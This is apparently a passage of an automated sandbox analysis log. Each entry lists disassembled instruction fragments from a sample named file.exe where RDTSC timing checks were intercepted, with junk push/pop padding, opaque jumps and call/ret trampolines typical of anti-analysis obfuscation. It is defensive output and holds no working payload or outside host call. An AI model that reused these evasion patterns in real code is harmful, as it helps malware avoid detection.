Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABD1C7 second address: ABD1DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD4C8509C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FD4C8509C36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABD1DC second address: ABD1EB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD4C8DA2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABD378 second address: ABD390 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8509C3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABD390 second address: ABD39E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA214Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC00CD second address: AC00D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC00D1 second address: AC00F3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD4C8DA2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD4C8DA2151h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC00F3 second address: AC00F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC00F8 second address: AC0175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA214Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov bx, AAA6h 0x0000000e jmp 00007FD4C8DA214Ah 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FD4C8DA2148h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+1245688Ah] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FD4C8DA2148h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov edi, dword ptr [ebp+122D3A08h] 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c pop edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jng 00007FD4C8DA2146h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC1153 second address: AC1159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC1159 second address: AC115D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC115D second address: AC1185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, dword ptr [ebp+122D3AACh] 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+1247D67Eh], ebx 0x00000019 push 00000000h 0x0000001b mov bx, di 0x0000001e xchg eax, esi 0x0000001f pushad 0x00000020 push eax 0x00000021 pushad 0x00000022 popad 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC1185 second address: AC11A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA214Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FD4C8DA2146h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC11A0 second address: AC11AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC11AA second address: AC11AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC11AE second address: AC11B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC22C9 second address: AC22D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC0279 second address: AC0293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD4C8509C3Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC0293 second address: AC029D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD4C8DA2146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC12ED second address: AC12F7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD4C8509C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC326A second address: AC32AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, 269DED30h 0x0000000e push 00000000h 0x00000010 mov di, 8661h 0x00000014 push 00000000h 0x00000016 jmp 00007FD4C8DA214Eh 0x0000001b xchg eax, esi 0x0000001c push esi 0x0000001d jmp 00007FD4C8DA2152h 0x00000022 pop esi 0x00000023 push eax 0x00000024 pushad 0x00000025 push esi 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 pop esi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC12F7 second address: AC1322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8509C48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD4C8509C3Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6554 second address: AC6558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6558 second address: AC65E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FD4C8509C38h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movzx edi, dx 0x00000027 push dword ptr fs:[00000000h] 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007FD4C8509C38h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov ebx, 28FA1CEDh 0x0000004d mov ebx, 3E15E82Eh 0x00000052 mov dword ptr fs:[00000000h], esp 0x00000059 mov ebx, 56D55D49h 0x0000005e mov eax, dword ptr [ebp+122D0F39h] 0x00000064 push FFFFFFFFh 0x00000066 mov bh, 19h 0x00000068 push eax 0x00000069 jng 00007FD4C8509C49h 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 popad 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC919D second address: AC91A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC91A3 second address: AC91A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD1879 second address: AD18A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jne 00007FD4C8DA2146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jl 00007FD4C8DA217Ah 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FD4C8DA214Dh 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD1B61 second address: AD1B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jnp 00007FD4C8509C36h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6B0B second address: AD6B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6C26 second address: AD6C30 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD4C8509C3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC1F3 second address: ADC1FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADB4BA second address: ADB4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADB8F5 second address: ADB8FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADB8FB second address: ADB90B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD4C8509C42h 0x00000008 jp 00007FD4C8509C36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADBA68 second address: ADBA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FD4C8DA2146h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADBBF9 second address: ADBBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADBBFF second address: ADBC03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADBEBB second address: ADBEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jmp 00007FD4C8509C3Ah 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FD4C8509C48h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADBEF0 second address: ADBF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007FD4C8DA2154h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADBF0C second address: ADBF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE0C29 second address: AE0C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE0EF3 second address: AE0F09 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FD4C8509C42h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE0F09 second address: AE0F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD4C8DA2146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE1075 second address: AE1079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE1079 second address: AE1088 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD4C8DA2146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE1088 second address: AE108D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8E4D1 second address: A8E4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FD4C8DA214Eh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8E4E0 second address: A8E4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE03BD second address: AE03C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B15F second address: A6B165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B165 second address: A6B17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 ja 00007FD4C8DA214Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B17C second address: A6B18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8509C3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3EEA second address: AB3F1C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 call 00007FD4C8DA2158h 0x0000000e or edx, dword ptr [ebp+122D1EA3h] 0x00000014 pop edi 0x00000015 nop 0x00000016 jl 00007FD4C8DA214Eh 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3FA7 second address: AB3FBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8509C42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB41A4 second address: AB41BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD4C8DA2156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB41BF second address: AB4251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FD4C8509C38h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000004h 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007FD4C8509C38h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e jmp 00007FD4C8509C3Ah 0x00000043 nop 0x00000044 jmp 00007FD4C8509C48h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FD4C8509C49h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4251 second address: AB4255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4255 second address: AB425B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB425B second address: AB4265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD4C8DA2146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4265 second address: AB4269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4748 second address: AB474F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB474F second address: AB4760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 js 00007FD4C8509C3Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4905 second address: AB4923 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD4C8DA214Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FD4C8DA214Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4923 second address: AB4927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4927 second address: AB492C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB492C second address: AB4972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c js 00007FD4C8509C40h 0x00000012 jmp 00007FD4C8509C3Ah 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a jp 00007FD4C8509C36h 0x00000020 popad 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FD4C8509C49h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4972 second address: AB4976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4976 second address: AB497C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4AAF second address: AB4B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8DA214Dh 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c sub dword ptr [ebp+122D17BBh], edi 0x00000012 lea eax, dword ptr [ebp+124954B2h] 0x00000018 sub dword ptr [ebp+122D1A25h], edi 0x0000001e push eax 0x0000001f jmp 00007FD4C8DA2150h 0x00000024 mov dword ptr [esp], eax 0x00000027 xor dword ptr [ebp+122D2024h], eax 0x0000002d lea eax, dword ptr [ebp+1249546Eh] 0x00000033 mov dword ptr [ebp+1247F831h], edi 0x00000039 push eax 0x0000003a jng 00007FD4C8DA2162h 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FD4C8DA2154h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4B18 second address: A8E4D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FD4C8509C38h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 xor edx, dword ptr [ebp+122D17A7h] 0x00000029 jl 00007FD4C8509C3Ch 0x0000002f mov dword ptr [ebp+122D184Dh], edx 0x00000035 call dword ptr [ebp+122D2794h] 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jmp 00007FD4C8509C3Bh 0x00000043 jmp 00007FD4C8509C46h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEDF98 second address: AEDF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEDF9C second address: AEDFA6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD4C8509C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEDFA6 second address: AEDFBA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD4C8DA214Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE3EE second address: AEE3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE3F2 second address: AEE3F8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE3F8 second address: AEE410 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FD4C8509C36h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FD4C8509C36h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE410 second address: AEE414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE414 second address: AEE418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE418 second address: AEE422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE422 second address: AEE42C instructions: 0x00000000 rdtsc 0x00000002 js 00007FD4C8509C3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF35D4 second address: AF35E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FD4C8DA2146h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF39B4 second address: AF39B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF3025 second address: AF302A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF42AE second address: AF42B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FD4C8509C36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
